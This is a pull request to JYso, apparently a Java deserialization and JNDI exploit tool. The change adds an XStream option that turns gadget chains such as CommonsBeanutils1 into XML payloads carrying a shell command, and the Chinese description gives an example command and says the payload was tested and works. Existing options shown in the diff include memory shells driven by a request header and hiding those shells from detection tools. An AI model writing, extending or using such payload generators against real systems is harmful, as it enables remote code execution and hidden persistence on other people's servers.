### PR TITLE
add XStream suggestion

### DIFF
--- a/build.gradle
+++ b/build.gradle
@@ -31,12 +31,14 @@ shadowJar {
 }
 
 dependencies {
+    implementation files('libs/jai-core-1.1.3.jar')
+    implementation files('libs/weblogic-server.jar')
     api libs.io.projectreactor.reactor.core
     api libs.com.ibm.websphere.appserver.api.com.ibm.websphere.appserver.api.wsoc
     api libs.org.glassfish.tyrus.tyrus.server
-    api libs.javax.media.jai.jai.core
+//    api libs.javax.media.jai.jai.core
     api libs.org.javassist.javassist
-    api libs.com.oracle.weblogic.weblogic.server
+//    api libs.com.oracle.weblogic.weblogic.server
     api libs.xerces.xercesimpl
     api libs.com.fasterxml.jackson.core.jackson.databind
     api libs.com.teradata.jdbc.terajdbc
@@ -95,6 +97,7 @@ dependencies {
 //    api libs.commons.beanutils.commons.beanutils
     api libs.javax.websocket.javax.websocket.api
     api libs.com.caucho.resin
+    api libs.com.thoughtworks.xstream
     implementation 'net.sf.json-lib:json-lib:2.4:jdk15'
     runtimeOnly libs.org.aspectj.aspectjweaver
     compileOnly libs.org.apache.tomcat.tomcat.websocket

--- a/gradle/libs.versions.toml
+++ b/gradle/libs.versions.toml
@@ -2,6 +2,7 @@
 # https://docs.gradle.org/current/userguide/platforms.html#sub::toml-dependencies-format
 
 [versions]
+com-thoughtworks-xstream = "1.4.15"
 cn-hutool-hutool-all = "5.7.7"
 com-alibaba-fastjson = "1.2.83"
 com-alibaba-fastjson2-fastjson2 = "2.0.26"
@@ -72,6 +73,7 @@ rome-rome = "1.0"
 xerces-xercesimpl = "2.12.0"
 
 [libraries]
+com-thoughtworks-xstream = { module = "com.thoughtworks.xstream:xstream", version.ref = "com-thoughtworks-xstream" }
 cn-hutool-hutool-all = { module = "cn.hutool:hutool-all", version.ref = "cn-hutool-hutool-all" }
 com-alibaba-fastjson = { module = "com.alibaba:fastjson", version.ref = "com-alibaba-fastjson" }
 com-alibaba-fastjson2-fastjson2 = { module = "com.alibaba.fastjson2:fastjson2", version.ref = "com-alibaba-fastjson2-fastjson2" }

--- a/src/main/java/com/qi4l/jndi/controllers/ysoserial.java
+++ b/src/main/java/com/qi4l/jndi/controllers/ysoserial.java
@@ -135,15 +135,14 @@ public class ysoserial {
 
         final String payloadType = cmdLine.getOptionValue("gadget");
         final String command     = cmdLine.getOptionValue("parameters");
-        final Class<? extends ObjectPayload> payloadClass = ObjectPayload.Utils.getPayloadClass(cmdLine.getOptionValue("XStream"));;
-//        if (Config.IS_XSTREAM){
-//            payloadClass = ObjectPayload.Utils.getPayloadClass(cmdLine.getOptionValue("XStream"));
-//        }else {
-//            payloadClass = ObjectPayload.Utils.getPayloadClass(payloadType);
-//        }
+        Class<? extends ObjectPayload> payloadClass = null;
+        if (Config.IS_XSTREAM){
+            payloadClass = ObjectPayload.Utils.getPayloadClass(cmdLine.getOptionValue("XStream"));
+        }else {
+            payloadClass = ObjectPayload.Utils.getPayloadClass(payloadType);
+        }
 
         if (payloadClass == null) {
-
             System.err.println("Invalid payload type '" + payloadType + "'");
             printUsage(options);
             System.exit(1);
@@ -205,7 +204,7 @@ public class ysoserial {
         options.addOption("ch", "cmd-header", true, "Request Header which pass the command to Execute,default [X-Token-Data]");
         options.addOption("gen", "gen-mem-shell", false, "Write Memory Shell Class to File");
         options.addOption("n", "gen-mem-shell-name", true, "Memory Shell Class File Name");
-        options.addOption("x", "XStream", true, "Xstream deserialization");
+        options.addOption("x", "XStream", true, "Generate Xstream serialization xml");
         options.addOption("h", "hide-mem-shell", false, "Hide memory shell from detection tools (type 2 only support SpringControllerMS)");
         options.addOption("ht", "hide-type", true, "Hide memory shell,type 1:write /jre/lib/charsets.jar 2:write /jre/classes/");
         options.addOption("rh", "rhino", false, "ScriptEngineManager Using Rhino Engine to eval JS");

--- a/src/main/java/com/qi4l/jndi/controllers/ysoserial.java
+++ b/src/main/java/com/qi4l/jndi/controllers/ysoserial.java
@@ -9,7 +9,6 @@ import com.qi4l.jndi.gadgets.utils.StringUtil;
 import com.qi4l.jndi.gadgets.utils.dirty.DirtyDataWrapper;
 import org.apache.commons.cli.*;
 
-import java.io.ByteArrayOutputStream;
 import java.io.FileOutputStream;
 import java.io.OutputStream;
 import java.util.*;
@@ -130,11 +129,21 @@ public class ysoserial {
             }
         }
 
+        if(cmdLine.hasOption("XStream")){
+            Config.IS_XSTREAM = true;
+        }
+
         final String payloadType = cmdLine.getOptionValue("gadget");
         final String command     = cmdLine.getOptionValue("parameters");
+        final Class<? extends ObjectPayload> payloadClass = ObjectPayload.Utils.getPayloadClass(cmdLine.getOptionValue("XStream"));;
+//        if (Config.IS_XSTREAM){
+//            payloadClass = ObjectPayload.Utils.getPayloadClass(cmdLine.getOptionValue("XStream"));
+//        }else {
+//            payloadClass = ObjectPayload.Utils.getPayloadClass(payloadType);
+//        }
 
-        final Class<? extends ObjectPayload> payloadClass = ObjectPayload.Utils.getPayloadClass(payloadType);
         if (payloadClass == null) {
+
             System.err.println("Invalid payload type '" + payloadType + "'");
             printUsage(options);
             System.exit(1);
@@ -196,6 +205,7 @@ public class ysoserial {
         options.addOption("ch", "cmd-header", true, "Request Header which pass the command to Execute,default [X-Token-Data]");
         options.addOption("gen", "gen-mem-shell", false, "Write Memory Shell Class to File");
         options.addOption("n", "gen-mem-shell-name", true, "Memory Shell Class File Name");
+        options.addOption("x", "XStream", true, "Xstream deserialization");
         options.addOption("h", "hide-mem-shell", false, "Hide memory shell from detection tools (type 2 only support SpringControllerMS)");
         options.addOption("ht", "hide-type", true, "Hide memory shell,type 1:write /jre/lib/charsets.jar 2:write /jre/classes/");
         options.addOption("rh", "rhino", false, "ScriptEngineManager Using Rhino Engine to eval JS");

--- a/src/main/java/com/qi4l/jndi/gadgets/Config/Config.java
+++ b/src/main/java/com/qi4l/jndi/gadgets/Config/Config.java
@@ -83,6 +83,7 @@ public class Config {
     public static Boolean IS_UTF_Bypass = false;
     public static Boolean IS_Hessian1 = false;
     public static Boolean IS_Hessian2 = false;
+    public static Boolean IS_XSTREAM = false;
     // 填充的脏数据长度
     public static int DIRTY_LENGTH_IN_TC_RESET = 0;
 

--- a/src/main/java/com/qi4l/jndi/gadgets/utils/Serializer.java
+++ b/src/main/java/com/qi4l/jndi/gadgets/utils/Serializer.java
@@ -2,6 +2,7 @@ package com.qi4l.jndi.gadgets.utils;
 
 import com.caucho.hessian.io.*;
 import com.qi4l.jndi.gadgets.utils.utf8OverlongEncoding.UTF8OverlongObjectOutputStream;
+import com.thoughtworks.xstream.XStream;
 
 import java.util.Base64;
 import java.io.ByteArrayOutputStream;
@@ -65,6 +66,8 @@ public class Serializer implements Callable<byte[]> {
             AobjOut.setSerializerFactory(sf);
             AobjOut.writeObject(obj);
             AobjOut.close();
+        } else if (IS_XSTREAM) {
+            xStreamSerialize(obj);
         } else {
             if (BASE64) {
                 objOut = new SuObjectOutputStream(outB64);
@@ -75,6 +78,8 @@ public class Serializer implements Callable<byte[]> {
 
         if (IS_Hessian1 || IS_Hessian2) {
             AobjOut.writeObject(obj);
+        } else if (IS_XSTREAM){
+            return;
         } else {
             objOut.writeObject(obj);
         }
@@ -88,6 +93,12 @@ public class Serializer implements Callable<byte[]> {
 
     public byte[] call() throws Exception {
         return serialize(object);
+    }
+
+    public static void xStreamSerialize(Object payload) {
+        XStream xstream = new XStream();
+        String xml = xstream.toXML(payload);
+        System.out.println(xml);
     }
 
     public static class SuObjectOutputStream extends ObjectOutputStream {


### PR DESCRIPTION
我为JYso添加了Xstream支持，现在使用`-y -x gadget`选项即可生成xml格式payload。
`java -jar JYso-1.3.2-all.jar -y -x CommonsBeanutils1 -p 'cmd'`可以生成xstream的poc：
![image](https://github.com/user-attachments/assets/b9307190-cdcd-4555-af71-95068c7ea0b5)
这种方法生成的poc经测试是可用的：
![image](https://github.com/user-attachments/assets/6e9f0249-4264-43be-9d14-9651bebd44ca)
对此我修改了依赖，新增了xstream依赖，同时为了方便打包，我将lib目录两个依赖的jar包以相对路径的形式默认写在了build.gradle中